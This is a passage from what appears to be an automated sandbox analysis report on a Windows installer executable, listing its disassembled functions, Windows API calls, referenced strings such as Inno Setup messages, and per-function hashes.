                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                              • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                              • API String ID: 854858120-615399546
                                                              • Opcode ID: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                              • Instruction ID: 058baa7e90e176347c833b132b7c272bf8058e823d6e061bdbf2f6311869cd9e
                                                              • Opcode Fuzzy Hash: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                              • Instruction Fuzzy Hash: 41516D34B0074DABCF10EFA5D852BDEBBB9AF44305F50447BB804B7292D7789A098B59
                                                              Function 0042368C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                              • OemToCharA.USER32(?,?), ref: 0042375C
                                                              • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Char$FileIconLoadLowerModuleName
                                                              • String ID: 2$MAINICON
                                                              • API String ID: 3935243913-3181700818
                                                              • Opcode ID: a0d1a492a3e1df344d79b5ede7937f80cf878dadafa44837ceada302c6d607ca
                                                              • Instruction ID: 339a64ebbf2375270c19ef2cfa2d714624ee8dcb7e06b01b5ae6522dc3b50067
                                                              • Opcode Fuzzy Hash: a0d1a492a3e1df344d79b5ede7937f80cf878dadafa44837ceada302c6d607ca
                                                              • Instruction Fuzzy Hash: 243181B0A042549ADF10EF29D8C57C67BA8AF14308F4441BAE844DB393D7BED988CB59
                                                              Function 00418F38 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
                                                              • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
                                                              • GetCurrentThreadId.KERNEL32 ref: 00418F79
                                                              • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
                                                                • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
                                                                • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
                                                                • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
                                                              • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                              • API String ID: 316262546-2767913252
                                                              • Opcode ID: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                              • Instruction ID: d883a59e21ed3b4d0722d018b4a025de81f9e45e1fd093e44b5ebaba0e30331f
                                                              • Opcode Fuzzy Hash: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                              • Instruction Fuzzy Hash: AC115E706142419AD740FF76A94235A7BE1DF64308F40943FF448A7391DB3DA9448B5F
                                                              Function 0041363C Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                              • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                              • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                              • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                              • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$Prop
                                                              • String ID:
                                                              • API String ID: 3887896539-0
                                                              • Opcode ID: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                              • Instruction ID: 06abc153636d574f2b9d5b42ed2ef1d3d1989bf2b09c04f5b7aa0ee96fd2bcf7
                                                              • Opcode Fuzzy Hash: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                              • Instruction Fuzzy Hash: 1011C975100244BFEF00DF9DDC84EDA37E8EB19364F144666B958DB2A2D738DD908B68
                                                              Function 004556D8 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
                                                              Strings
                                                              • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
                                                              • PendingFileRenameOperations, xrefs: 00455754
                                                              • PendingFileRenameOperations2, xrefs: 00455784
                                                              • WININIT.INI, xrefs: 004557E4
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen
                                                              • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                              • API String ID: 47109696-2199428270
                                                              • Opcode ID: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                              • Instruction ID: 0fa1da25f67206326559771d92c7e47b52ca8d856d575cc5f046ac455f5bab2a
                                                              • Opcode Fuzzy Hash: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                              • Instruction Fuzzy Hash: FF51A974E006089FDB10EF61DC51AEEB7B9EF44305F50857BEC04A7292DB78AE49CA58
                                                              Function 0047CB94 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC27
                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC30
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                              • API String ID: 1375471231-2952887711
                                                              • Opcode ID: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                              • Instruction ID: e6577b7b61f0e0a35e690824fc442bae28cfcbc8f9cba78cd8161ab2dbd6b5d1
                                                              • Opcode Fuzzy Hash: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                              • Instruction Fuzzy Hash: E6412834A001099BDB11EFA5D882ADEB7B5EF45309F50843BE81577392DA38AE05CF68
                                                              Function 00423A84 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                              • GetWindow.USER32(?,00000003), ref: 00423ABD
                                                              • GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                              • SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$EnumLongWindows
                                                              • String ID: \AB
                                                              • API String ID: 4191631535-3948367934
                                                              • Opcode ID: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                              • Instruction ID: 3ad81c14f5822e14e615a382c86082b2427cd388a5bf15486a3129e996868218
                                                              • Opcode Fuzzy Hash: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                              • Instruction Fuzzy Hash: D6115E70700610ABDB109F28E885F5677E8EB08715F10026AF994AB2E3C378ED41CB59
                                                              Function 0042DE44 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32registrylibraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE50
                                                              • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003,?,?,?,?,00000006,?,00000000,0049785D), ref: 0042DE6B
                                                              • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressDeleteHandleModuleProc
                                                              • String ID: RegDeleteKeyExA$advapi32.dll
                                                              • API String ID: 588496660-1846899949
                                                              • Opcode ID: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                              • Instruction ID: e7246de0df94fba710dd2820c0ca51643d5dd29c3ac0bea476bad59fd0e01b91
                                                              • Opcode Fuzzy Hash: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                              • Instruction Fuzzy Hash: 73E06DF1B41B30AAD72022657C8ABA33729DB75365F658437F105AD19183FC2C50CE9D
                                                              Function 0046BB10 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 320COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • NextButtonClick, xrefs: 0046BC4C
                                                              • Need to restart Windows? %s, xrefs: 0046BE95
                                                              • PrepareToInstall failed: %s, xrefs: 0046BE6E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                              • API String ID: 0-2329492092
                                                              • Opcode ID: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                              • Instruction ID: 9de4db1b3e70fdebeced0fe060001c857bcfdee1b2562a0b259a97201065334e
                                                              • Opcode Fuzzy Hash: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                              • Instruction Fuzzy Hash: 46D12F34A00108DFCB14EB99D985AED77F5EF49304F5440BAE404EB362D778AE85CB9A
                                                              Function 00483084 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetActiveWindow.USER32(?,?,00000000,004833D5), ref: 004831A8
                                                              • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00483246
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ActiveChangeNotifyWindow
                                                              • String ID: $Need to restart Windows? %s
                                                              • API String ID: 1160245247-4200181552
                                                              • Opcode ID: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                              • Instruction ID: 855c298393525188f16043e43c8caa20abfdb27870bda8f6eb76b0fac02994d3
                                                              • Opcode Fuzzy Hash: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                              • Instruction Fuzzy Hash: 7E918F34A042449FDB10EF69D8C6BAD77E0AF55708F5484BBE8009B362DB78AE05CB5D
                                                              Function 0046FADC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                              • GetLastError.KERNEL32(00000000,0046FCD9,?,?,0049C1E0,00000000), ref: 0046FBB6
                                                              • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FC30
                                                              • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FC55
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ChangeNotify$ErrorFullLastNamePath
                                                              • String ID: Creating directory: %s
                                                              • API String ID: 2451617938-483064649
                                                              • Opcode ID: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                              • Instruction ID: a145aa70eb484b5d007d33f2831cd5d1f219efd535f83afbcf26a903565c5eea
                                                              • Opcode Fuzzy Hash: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                              • Instruction Fuzzy Hash: 7D512F74E00248ABDB01DBA5D982ADEBBF4AF49304F50847AEC50B7382D7795E08CB59
                                                              Function 00454DD4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressByteCharMultiProcWide
                                                              • String ID: SfcIsFileProtected$sfc.dll
                                                              • API String ID: 2508298434-591603554
                                                              • Opcode ID: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                              • Instruction ID: 709c5f55a6f5f8285c9c61fd8393730e8027effee09c5548c71846991cac34f0
                                                              • Opcode Fuzzy Hash: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                              • Instruction Fuzzy Hash: E8419671A04318DBEB20EF59DC85B9DB7B8AB4430DF5041B7A908A7293D7785F88CA1C
                                                              Function 00452510 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • 74D31520.VERSION(00000000,?,?,?,00497900), ref: 00452530
                                                              • 74D31500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 0045255D
                                                              • 74D31540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 00452577
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: D31500D31520D31540
                                                              • String ID: %E
                                                              • API String ID: 1003763464-175436132
                                                              • Opcode ID: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                              • Instruction ID: f5dca5bfdad9659449235e2d7a4f424f1fde127461be4d93bb02e754cc996b3f
                                                              • Opcode Fuzzy Hash: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                              • Instruction Fuzzy Hash: D2218331A00608BFDB01DAA989519AFB7FCEB4A300F554477F800E7242E6B9AE04C765
                                                              Function 0044B38C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0044B401
                                                              • SelectObject.GDI32(?,00000000), ref: 0044B424
                                                              • ReleaseDC.USER32(00000000,?), ref: 0044B457
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ObjectReleaseSelect
                                                              • String ID: %H
                                                              • API String ID: 1831053106-1959103961
                                                              • Opcode ID: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                              • Instruction ID: 242bcfed98594cbdcf51f2854abe94a1ec69c13560e3a72339b9f4254961cc58
                                                              • Opcode Fuzzy Hash: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                              • Instruction Fuzzy Hash: 62216570A04248AFEB15DFA6C841B9F7BB9DB49304F11806AF904A7682D778D940CB59
                                                              Function 0044B0C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,%H,?,?), ref: 0044B11E
                                                              • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
                                                              • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
